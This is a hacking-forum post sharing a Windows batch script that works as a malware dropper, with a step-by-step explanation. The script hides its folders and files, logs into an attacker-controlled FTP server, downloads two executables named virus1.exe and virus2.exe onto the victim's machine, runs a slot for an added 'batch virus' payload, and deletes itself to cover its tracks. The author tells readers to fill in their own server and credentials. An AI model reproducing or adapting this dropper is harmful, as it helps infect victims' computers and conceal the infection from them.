Hack Forums / Hacks, Exploits, and Various Discussions / Batch ,Shell, Dos and Command Line Interpreters / FTP downlaoding with batch files

Your Ad Here
Post Reply 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
FTP downlaoding with batch files
11-04-2009, 07:59 PM
Post: #1
lithium9 Offline
Entry Level
*
 		Posts: 7
Joined: Oct 2009
Reputation: 0
Code:
@ECHO OFF
GOTO Check
::***********************************************
::***********************************************
:: -(***BEG)***-\ Payload contents /-***(BEG)***-
:Payload



:: Payload contents here



:: -***(END)***-\ Payload contents /-***(END)***-
::***********************************************
::***********************************************
CLS
GOTO Leave
:FTPit
ECHO user USERNAME PASSWORD >> "%SystemRoot%\Temp\scrypt.txt"
ECHO quote pasv >> "%SystemRoot%\Temp\scrypt.txt"
ECHO binary >> "%SystemRoot%\Temp\scrypt.txt"
ECHO recv htdocs/virus1.exe %SystemDrive%\FTPit\virus1.exe >> "%SystemRoot%\Temp\scrypt.txt"
ECHO recv htdocs/virus2.exe %SystemDrive%\FTPit\virus2.exe >> "%SystemRoot%\Temp\scrypt.txt"
ECHO bye >> "%SystemRoot%\Temp\scrypt.txt"
REN %SystemRoot%\Temp\scrypt.txt scrypt.ftp
ATTRIB +r +s +h %SystemRoot%\Temp\scrypt.ftp
MKDIR %SystemDrive%\FTPit
ATTRIB +s +h %SystemDrive%\FTPit
CD %SystemRoot%\Temp
ftp -i -n -v -s:scrypt.ftp www.yourserver.com
ATTRIB -r -s -h %SystemRoot%\Temp\scrypt.ftp
DEL /f /q %SystemRoot%\Temp\scrypt.ftp
CLS
GOTO Payload
:Check
IF EXIST %SystemRoot%\system32
GOTO FTPit
IF NOT EXIST %SystemRoot%\system32
GOTO Leave
:Leave
del /f /q %0
EXIT


Step by step of what it does...

1. If the victim has a "c:\windows\system32" folder it continues on.. if the victim does not have said folder- the batch file deletes itself.

2. It creates a new "Hidden System" folder labeled "FTPit" in victims Local Disk (usually C:\)

3. It creates a "Read-Only Hidden System" file labeled scrypt.ftp in "C:WINDOWS\Temp" with the following contents:
Code:
user USERNAME PASSWORD
quote pasv
binary
recv htdocs/virus2.exe %SystemDrive%\FTPit\virus2.exe
recv htdocs/virus2.exe %SystemDrive%\FTPit\virus2.exe
bye

4. It downloads virus1.exe & virus2.exe from your htdocs folder on your server and stores them on the victims PC in "C:\FTPit\"

5. It deletes the scrypt.ftp created previously.

6. It does your payload (whatever batch you add to the payload area)

7. Then the batch deletes itself.

All you need to do now is change:
Code:
USERNAME
PASSWORD
www.yourserver.com

To your FTP information, upload your virus1.exe & virus2.exe to your htdocs folder on your server,..

- then replace:
Code:
:: Payload contents here

With whatever batch virus you'd like to add as a payload...
Find all posts by this user thanks
Quote this message in a reply
Your Ad Here
Post Reply 




Contact Us | Hack Forums | Return to Top | Return to Content | Lite (Archive) Mode | RSS Syndication | Awards | Legal Policies

Hacker Topsites Website Hosting